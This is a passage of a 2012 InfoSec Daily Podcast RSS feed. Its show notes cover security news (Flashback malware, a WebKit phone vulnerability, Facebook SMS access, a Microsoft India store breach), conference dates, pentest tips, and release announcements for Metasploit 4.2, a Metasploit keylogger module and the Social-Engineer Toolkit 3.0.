<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apart from attempting to steal user credentials, Flashback also introduces instability causing a number of applications such as Safari and Skype to crash, &ldquo;because the injected code interferes with the program making it unstable.&rdquo; The two defenses are to install anti-virus and keep applications such as Java fully patched &ndash; advice that should be heeded by all computer users all of the time. Mac users, however, should also take this as a warning that Macs are not as secure as their reputation suggests.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.networkworld.com/news/2012/022712-crowdstrike-ceo-to-reveal-major-256617.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.networkworld.com/news/2012/022712-crowdstrike-ceo-to-reveal-major-256617.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A significant vulnerability affecting all versions of the Webkit mobile browser could give malware complete control of your phone. The malware could listen in on your conversations, view through your camera and record everything in your email and messages. It can also track your locations at the time. George Kurtz, CEO of the new security company CrowdStrike, has told CSO he&#39;ll demonstrate how the vulnerability works at a presentation at RSA Wednesday.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Kurtz, the new vulnerability affects all Android, iOS and newer BlackBerry devices. It does not affect devices running Microsoft Windows Phone 7. Kurtz said this means virtually every smartphone and tablet in use globally shares this vulnerability. Worse, security software currently available for mobile devices won&#39;t detect such malware and won&#39;t protect against it.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kurtz is perhaps best known for his revelations regarding the Chinese Shady Rat operation that compromised US government and defense contractors in 2011. Kurtz discovered the Chinese cyber attacks on the US while he was CTO at McAfee. He left that company after the Intel acquisition.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.news.com.au/technology/facebook-spies-on-phone-users-text-messages-report-says/story-e6frfro0-1226282024364"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.news.com.au/technology/facebook-spies-on-phone-users-text-messages-report-says/story-e6frfro0-1226282024364</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://news.cnet.com/8301-1009_3-57385429-83/facebook-denies-accessing-users-text-messages/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-1009_3-57385429-83/facebook-denies-accessing-users-text-messages/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Facebook admitted reading text messages belonging to smartphone users who downloaded the social-networking app and said that it was accessing the data as part of a trial to launch its own messaging service, </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">The (London) Sunday Times </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">reported.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Other well-known companies accessing smartphone users&#39; personal data &#8211; such as text messages &#8211; include photo-sharing site Flickr, dating site Badoo and Yahoo Messenger, the paper said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It claimed that some apps even allow companies to intercept phone calls &#8211; while others, such as YouTube, are capable of remotely accessing and operating users&#39; smartphone cameras to take photographs or videos at any time.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security app My Remote Lock and the app Tennis Juggling Game were among smaller companies&#39; apps that may intercept users&#39; calls, the paper said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Emma Draper, of the Privacy International campaign group, said, &quot;Your personal information is a precious commodity, and companies will go to great lengths to get their hands on as much of it as possible.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Facebook statement: &quot;Facebook is currently running a limited test of mobile features which integrate with SMS functionality. SMS read/write is not currently implemented for most users of the mobile app. As part of this test, we declared the presence of that functionality within our app store permissions starting with the 1.7 version of our application. If Facebook ultimately launches any feature that makes use of these permissions, we will ensure that this is accompanied by appropriate guidance/educational materials.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-605-microsoft-fail-facebook-millionaires-mac-hole-webkit-vuln-and-facebook-snoopers/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3557/0/infosec-daily-podcast-episode-605.mp3" length="19159544" type="audio/mpeg" />
		<itunes:duration>0:39:52</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 605 for February 27, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Beau Woods, and Karthik Rangarajan.
	&#160;
Announcements:
Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 605 for February 27, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Beau Woods, and Karthik Rangarajan.
	&#160;
Announcements:
Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/certified-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open! &#160;If you have some Anti-Forensics talks, that would be awesome.
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA http://www.sans.org/mentor/details.php?nid=28014
	Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
	Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://thenextweb.com/in/2012/02/27/microsoft-india-backtracks-hack-may-have-exposed-customer-credit-card-details-after-all/
	Microsoft has performed an about-turn in India and revealed that a recent hack of its online store may have compromised credit card details belonging to customers in the country.
	When the Microsoft India Store was hacked earlier this month, the company emailed its customers to assure them that &#8220;databases storing credit card details and payment information were not affected during this compromise&#8221;. However, it now appears that this is incorrect.
	As Wall Street Journal columnist Amit Agarwal writes on his own blog, a new update from Microsoft, which was sent to its customers today, has rather different news:
Further detailed investigation and review of data provided by the website operator revealed that financial information may have been exposed for some Microsoft Store India customers.
Furthermore, the store itself is still down, some two weeks after the incident, suggesting that there are serious problems afoot.

	Agarwal claims that Quasar Media, the company responsible for managing the online store, may have held customer data in plain text within the database. If true, it would allow the perpetrators of the attack to gain the information, and serious questions must asked as to why credit card details were not properly secured.
	&#8230;.
	Source: http://www.scmagazine.com/facebook-click-jackers-allegedly-made-12-million-per-month/article/225012/
	As Facebook grows ever bigger, its popularity among persons seeking financial gains through digital deception increases commensurately. Witness the lawsuit filed this week by Washington State Attorney General Rob McKenna against the co-owners of Adscend Media, LLC. The complaint alleges that the ad network operated by [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 604 &#8211; Weekly wrap up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-604-weekly-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-604-weekly-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 26 Feb 2012 04:00:41 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3554</guid>
		<description><![CDATA[Episode 604 &#8211; Weekly wrap up with Dr. b0n3z InfoSec Daily Podcast Episode 604 for February 25, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez and Boris Sverdlik. Guests: aricon, oncee, and spridel &#160; Announcements: Social Engineering Training When: March 5-9, 2012 Where: Seattle, Washington When: July 21-24, 2012 Where: Black Hat Vegas When: August [...]]]></description>
			<content:encoded><![CDATA[<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Episode 604 &#8211; </span><span style="font-size: 15px;font-family: Arial;vertical-align: baseline">Weekly wrap up with Dr. b0n3z</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">InfoSec Daily Podcast Episode 604 for February 25, 2012. &nbsp;</span><span style="font-size: 13px;font-family: Verdana;vertical-align: baseline">Tonight&#039;s podcast is hosted by Dr. Bonez and Boris Sverdlik.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Guests: aricon, oncee, and spridel</span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;vertical-align: baseline">Announcements:</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Social Engineering Training</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: March 5-9, 2012<br class="kix-line-break" /><br />
	<br />
	Where: Seattle, Washington</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 21-24, 2012<br class="kix-line-break" /><br />
	<br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: August 20-24, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	<br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/social-engineer-training</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">InfoSec Southwest</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: March 30-April 1</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span>http://www.Infosecsouthwest.com</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Linuxfest Northwest 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">CFP now open!</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">AIDE 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 21-25, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: MU Forensic Science Center</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span>http://aide.marshall.edu</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">CFP now open! &nbsp;If you have some Anti-Forensics talks, that would be awesome.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">LayerOne 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 26-27, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span>http://www.layerone.org</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">CFP now open!</span></b></p>
<p>&nbsp;</p>
<h5><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></b></h5>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: June 20 &#8211; 27, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span> </span></a><br />
	<a href="http://www.sans.org/mentor/details.php?nid=28014"><span>http://www.sans.org/mentor/details.php?nid=28014</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Inside and Out of the Social-Engineer Toolkit (SET)</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 21 &#8211; 22, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 23 &#8211; 24, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Black Hat Vegas</span><br />
	<a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span>http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Defcon 20</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 26-29, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span>http://defcon.org/</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">CFP &amp; Room reservations now open!</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> and locate the Affiliate Program link on the right hand side.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;text-decoration: underline;vertical-align: baseline">Stories</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Pentest Lessons:</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">1.</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline"> </span><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">When performing a pentest, make sure that the box you are targeting is not your box (or a VM on your box).</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">2. </span><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">If you IP is included in the assessment scope (internal NVA/PT), make sure to remove any &nbsp;findings from the report that relate to your box.</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">3. </span><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">After a pentest, make sure you clean up after yourself (i.e. do not leave the systems worse than you found them).</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">4. </span><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">If you tell the customer you will have their report on a particular date, then you better make every effort to make that deadline!</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source: </span><a href="https://community.rapid7.com/community/metasploit/blog/2012/02/22/metasploit-42-released"><span>https://community.rapid7.com/community/metasploit/blog/2012/02/22/metasploit-42-released</span></a><br />
	<span>Since our last release in October, we&#039;ve added 54 new exploits, 66 new auxiliary modules, 43 new post-exploitation modules, and 18 new payloads &#8212; that clocks in at just about 1.5 new modules per day since version 4.1. Clearly, this kind of volume is way too much to detail in a single update blog post. Of course, you could just dive in and download the latest version to get started. In the meantime, here are the highlights for this latest release of Metasploit.</span></b></p>
<p><b><span>IPv6 Coverage</span><br />
	<span>Virtualization as an Attack Vector</span><br />
	<span>New Resource Scripts</span><br />
	<span>The Ghost of Updates Past</span><br />
	<span>Details and Availability</span><br />
	<span> </span><br />
	<span>For detailed information on this release, check out Jcran&#039;s most excellent </span><a href="https://community.rapid7.com/docs/DOC-1701"><span>release notes</span></a><span>. To start playing with the shiny new Metasploit 4.2, </span><a href="http://www.rapid7.com/downloads/metasploit.jsp"><span>download your free copy now</span></a><span>.</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&hellip;.</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source: </span><a href="https://community.rapid7.com/community/metasploit/blog/2012/02/21/metasploit-javascript-keylogger"><span>https://community.rapid7.com/community/metasploit/blog/2012/02/21/metasploit-javascript-keylogger</span></a><br />
	<span>Rarely does a week go by without a friend or family member getting their login credentials compromised, then reused for malicious purposes. My wife is always on the lookout on Facebook, warning relatives and friends to change their passwords. Many people don&#039;t understand how their credentials get compromised. Password reuse on several websites is usually the culprit. Password reuse is a problem even if the website encrypts the passwords in their databases. An attacker only needs to insert some evil code, and allow it to do the work for them.</span></b></p>
<p><b><span>So I sat down a couple of weeks ago and wrote a Metasploit based Javascript keylogger from scratch. I have to give props to Wei, Tod, and HD for motivation and help with fine tuning the module. &nbsp;Adding exploitation techniques to Metasploit solves any scalability and deploy-ability issues. James &quot;</span><a href="http://twitter.com/egyp7"><span>@egyp7</span></a><span>&quot; Lee presented a talk at the last BSides Las Vegas, on why it makes sense to develop these types of tools using Metasploit. The reason is Metasploit has tons of code that you can reuse to build anything, almost like Lego blocks.</span><br />
	<span> </span><br />
	<span>The Metasploit Javascript Keylogger sets up a HTTP/HTTPS listener which serves the Javascript keylogger code and captures the keystrokes over the network. I&#039;ve include a demo page within the module for testing purposes. Just enter &quot;</span><span>set DEMO true</span><span>&quot; during module setup as you can see below to activate the demo page. To access the demo page, just append &quot;/demo&quot; to the URL provided.</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&hellip;.</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span><a href="https://www.secmaniac.com/blog/2012/02/20/the-social-engineer-toolkit-set-3-0-wethrowbaseballs-has-been-released/"><span>https://www.secmaniac.com/blog/2012/02/20/the-social-engineer-toolkit-set-3-0-wethrowbaseballs-has-been-released/</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Greetings all. I&rsquo;m excited to release the 3.0 version of the Social-Engineer Toolkit (SET) Codename &ldquo;#WeThrowBaseballs&rdquo;. This release has been one of the most challenging ones thus far with the largest changelog, code rehaul, and features. I&rsquo;ve literally been working on this for a solid three months. Please note that this is a major rehaul on the existing codebase, there are bound to be bugs. Please report bugs to davek [at] secmaniac.com. There&rsquo;s really way to much to cover on whats changed but here are a couple of major highlights (also check out the video!). It&rsquo;s truly humbling and inspiring to see how far SET has gone as being a tool used by virtually every penetration tester and security-minded folks. Could have never envisioned what it&rsquo;s turned into and can&rsquo;t thank everyone enough for the support.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">1. Support for Windows &ndash; Tested on XP, Windows 7, and Windows Vista. Note that the Metasploit-based payloads to not work yet &ndash; when SET detects Windows they will not be shown only RATTE and SET Shell</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">2. New attack vector added &ndash; QRCode Attack &ndash; Generates QRCodes that you can direct to SET and perform attacks like the credential harvester and Java Applet attacks</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">3. Improved A/V avoidance on the SETShell and better performance. I&rsquo;ve also fixed the non-encrypted communications when AES was not installed</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">4. Added a number of improvements and enhancements to all aspects of SET including major rehauls of the coding population and moved from things like subprocess.Popen(&ldquo;mv etc.&rdquo;) to shutil.copyfile(&ldquo;etc&rdquo;)</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">5. Rehauled SET Interactive Shell and RATTE to support Windows</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">6. New Metasploit exploits added to SET</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&#8230;</span></b></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-604-weekly-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3554/0/infosec-daily-podcast-episode-604.mp3" length="44836571" type="audio/mpeg" />
		<itunes:duration>0:46:42</itunes:duration>
		<itunes:subtitle>Episode 604 &#8211; Weekly wrap up with Dr. b0n3z
	InfoSec Daily Podcast Episode 604 for February 25, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez and Boris Sverdlik.
Guests: aricon, oncee, and spridel
&#160;
Announcements:
Social Engin[...]</itunes:subtitle>
		<itunes:summary>Episode 604 &#8211; Weekly wrap up with Dr. b0n3z
	InfoSec Daily Podcast Episode 604 for February 25, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez and Boris Sverdlik.
Guests: aricon, oncee, and spridel
&#160;
Announcements:
Social Engineering Training
	When: March 5-9, 2012
	
	Where: Seattle, Washington
	When: July 21-24, 2012
	
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open! &#160;If you have some Anti-Forensics talks, that would be awesome.
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Pentest Lessons:
	1. When performing a pentest, make sure that the box you are targeting is not your box (or a VM on your box).
